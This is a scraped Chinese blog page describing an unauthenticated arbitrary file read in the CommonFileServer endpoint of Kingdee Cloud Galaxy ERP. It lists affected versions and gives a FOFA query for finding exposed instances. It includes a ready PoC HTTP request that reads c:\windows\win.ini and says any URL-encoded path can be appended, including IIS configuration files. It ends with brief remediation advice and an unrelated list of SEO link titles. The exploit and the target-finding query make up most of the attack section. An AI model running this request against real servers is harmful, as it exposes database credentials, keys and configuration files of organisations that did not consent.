当前位置: 首页 > news >正文

青岛做网站优化公司禁止搜索引擎收录的方法

青岛做网站优化公司,禁止搜索引擎收录的方法,地方门户网站建设要求,wordpress onthego0x01 产品简介 金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字…

0x01 产品简介

     金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。

0x02 漏洞概述

     由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

0x03 影响范围

    6.x版本、7.x版本、8.x版本(均受影响)

0x04 复现环境

FOFA:app="金蝶云星空-管理中心" 

0x05 漏洞复现

PoC

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 ​​​PS:漏洞比较简单粗暴,直接在/CommonFileServer/路径后面拼接文件名就行(特殊符号url编码)

 读取IIS配置文件

 0x06 修复建议

关闭互联网暴露面设置目录权限

净化数据:对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。

 

 

http://www.dinnco.com/news/26317.html

相关文章:

  • 洛阳网站制作如何制作付费视频网站
  • 做网站 内网怎么映射苏州疫情最新通知
  • 做网站就是做服务seo网站优化多少钱
  • 宿迁做网站公司营销咨询公司排名前十
  • 如何做网站推广 求指点个人主页网页设计
  • 个人网站建设服务中国推广网站
  • 做app模板网站有哪些内容西安建站推广
  • 网站内页检测网站建设及网站推广
  • 怎么管理购物网站如何自己开发一个网站
  • 校园网站模板下载长春网站优化指导
  • 创意网站设计模板百度提问首页
  • 欧美网站模板 psd如何在百度发布广告信息
  • 动漫做h免费网站有哪些网站发布与推广方式
  • 菜鸟网站做图北京网站优化排名推广
  • 集团网站怎么建设百度渠道开户
  • 在线ui设计软件一个具体网站的seo优化
  • win本地网站建设营销型网站建设ppt
  • 关于织金县网站建设的论文深圳专门做seo的公司
  • 怎么建设网站模板上传如何外贸推广
  • 十堰网站制作餐饮管理培训课程
  • 北京好的做网站的公司哪家好收录批量查询工具
  • 哪个行业最需要做网站神马seo教程
  • 南昌网站开发商哪家强全国疫情高峰感染高峰进度查询
  • 获取网站验证码地址seo快速排名案例
  • 婚恋网站系统实训百度搜索引擎的总结
  • wordpress做论坛网站如何用手机创建网站
  • 怎样建设公司网站公司网站设计需要多少钱
  • 网站托管平台电商推广联盟
  • 做视频网站犯法吗上海优化价格
  • 做电商网站都需要学什么网站制作的步骤